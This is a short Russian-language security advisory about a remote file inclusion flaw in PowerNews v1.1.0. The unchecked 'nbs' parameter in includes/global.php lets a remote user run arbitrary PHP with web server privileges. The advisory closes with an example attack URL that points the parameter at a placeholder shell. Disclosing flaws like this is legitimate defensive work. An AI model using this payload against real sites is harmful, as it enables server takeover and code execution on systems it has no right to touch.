Программа: PowerNews v1.1.0
Уязвимость позволяет удаленному
пользователю выполнить произвольный PHP
сценарий на целевой системе. Уязвимость
существует из-за недостаточной обработки
входных данных в параметре "nbs" в
сценарии includes/global.php. Удаленный
пользователь может выполнить произвольный
PHP сценарий на целевой системе с
привилегиями Web сервера.
Пример:
http://[target]/includes/global.php?nbs=[shell]?
